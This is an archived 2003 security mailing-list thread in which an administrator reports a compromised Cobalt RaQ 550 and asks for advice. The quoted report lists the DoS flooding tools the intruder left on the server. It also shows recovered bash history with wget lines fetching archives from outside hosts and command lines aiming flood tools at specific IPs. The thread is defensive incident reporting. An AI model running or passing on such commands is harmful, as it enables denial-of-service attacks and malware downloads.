[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [cobalt-security] raq 550 hacked

Might be a good idea to contact that owner of the box at prohosting..


----- Original Message -----
From: "Tik & Klik Internetdiensten" <info@xxxxxxxxxx>
To: <cobalt-security@xxxxxxxxxxxxxxx>
Sent: Monday, October 06, 2003 3:14 PM
Subject: [cobalt-security] raq 550 hacked


> Hello,
>
> this weekend it looks like a raq 550 of mine whas hacked.
> i tracked some processes that was flooding.
> the program was called vladimII
>
> it was runned on the name of a user that had ssh access.
> when i blocked this user it started a day later with a nother user.
>
> this 2 users are from different sites on the same machine.
> But these 2 users are fronm the same person.
> tracking the ip's i came out in Washington
> but the user is dutch so it looks like someone hacked his computer to
> retreive his passwords ?
>
> Is there a way to look if the raq is infected or that blokking this user
to
> ssh will be enough
> the program was russing whas in the /home/tmp dir in the map flood, a list
> is below.
> the file broadcast.txt has 2102 ip's in it.
>
> i also have saved the bash history of the 2 users.
> there are several programs that was downloaded to my server.
> i shorted the bash to the progroms that was downloaded below this mail
>
> please advice
>
> ----------
> -rwxr-xr-x 1 xxx users 22446 Feb 9 2001 alpha
> -rwxr-xr-x 1 xxx users 23521 Aug 17 2000 bloop
> -rw-r--r-- 1 xxx users 31909 Aug 22 2001 broadcast.txt
> -rwxr-xr-x 1 xxx users 26981 May 9 01:10 cw
> -rwxr-xr-x 1 xxx users 2250 Apr 11 2001 da.sh
> -rwxr-xr-x 1 xxx users 24747 Mar 10 1996 juno
> -rwxr-xr-x 1 xxx users 25285 Aug 17 2000 nestea
> -rwxr-xr-x 1 xxx users 24577 Oct 3 2000 overdrop
> -rwxr-xr-x 1 xxx users 22803 Oct 17 2000 rc8
> -rwxr-xr-x 1 xxx users 28910 Sep 7 2000 s
> -rwxr-xr-x 1 xxx users 24786 Mar 10 1996 sl
> -rwxr-xr-x 1 xxx users 17027 Feb 9 2001 sl2
> -rwxr-xr-x 1 xxx users 17027 Mar 2 2001 sl3
> -rwxr-xr-x 1 xxx users 17027 Aug 22 2001 slice2
> -rwxr-xr-x 1 xxx users 14883 May 13 2001 slice3
> -rwxr-xr-x 1 xxx users 33962 Oct 17 2000 smack
> -rwxr-xr-x 1 xxx users 31558 Feb 18 2001 smurf5
> -rwxr-xr-x 1 xxx users 39382 Sep 7 2001 smurf6
> -rw-r--r-- 1 xxx users 19008 Aug 22 2001 smurf6-linux+LPG.c
> -rwxr-xr-x 1 xxx users 22158 Aug 6 2000 stealth
> -rwxr-xr-x 1 xxx users 15087 May 13 2001 stream
> -rwxr-xr-x 1 xxx users 15151 May 13 2001 stream2
> -rwxr-xr-x 1 xxx users 23011 Jul 10 00:07 super
> -rwxr-xr-x 1 xxx users 23671 May 13 2001 synhose
> -rwxr-xr-x 1 xxx users 26449 Feb 7 1996 synk
> -rwxr-xr-x 1 xxx users 15687 May 13 2001 synk7
> -rwxr-xr-x 1 xxx users 16519 May 13 2001 synsend
> -rwxr-xr-x 1 xxx users 23587 May 13 2001 trash
> -rwxr-xr-x 1 xxx users 26252 May 13 2001 trash2
> -rwxr-xr-x 1 xxx users 22741 Nov 8 2000 udp
> -rwxr-xr-x 1 xxx users 22446 Aug 22 2001 vadimI
> -rwxr-xr-x 1 xxx users 2635 Aug 22 2001 vadimI.c
> -rwxr-xr-x 1 xxx users 23414 Jun 25 21:52 vadimII
> -rwxr-xr-x 1 xxx users 13607 May 13 2001 xdestroy
> -rwxr-xr-x 1 xxx users 15119 May 13 2001 xshock
>
> -----
> bash history
> wget www.ps-lov.us/pizda.tgz
> wget snow.prohosting.com/muiemuie/p.tar.gz
> wget snow.prohosting.com/muiemuie/p.tgz
> wget snow.prohosting.com/muiemuie/km3.tgz
> wget 65.113.119.133/muiemuie/km3.tgz
>
> its runns programs like
> ./super 69.65.48.23 53 nasa.gov
> ./vadimII 210.0.204.185 53 100000000000000000000000000000000000000 0
> ./cw 210.0.204.185
> ./stealth 210.0.204.185 6500000000000
> ./super 64.207.19.6 53 nasa.gov
>
>
> _______________________________________________
> cobalt-security mailing list
> cobalt-security@xxxxxxxxxxxxxxx
> http://list.cobalt.com/mailman/listinfo/cobalt-security
>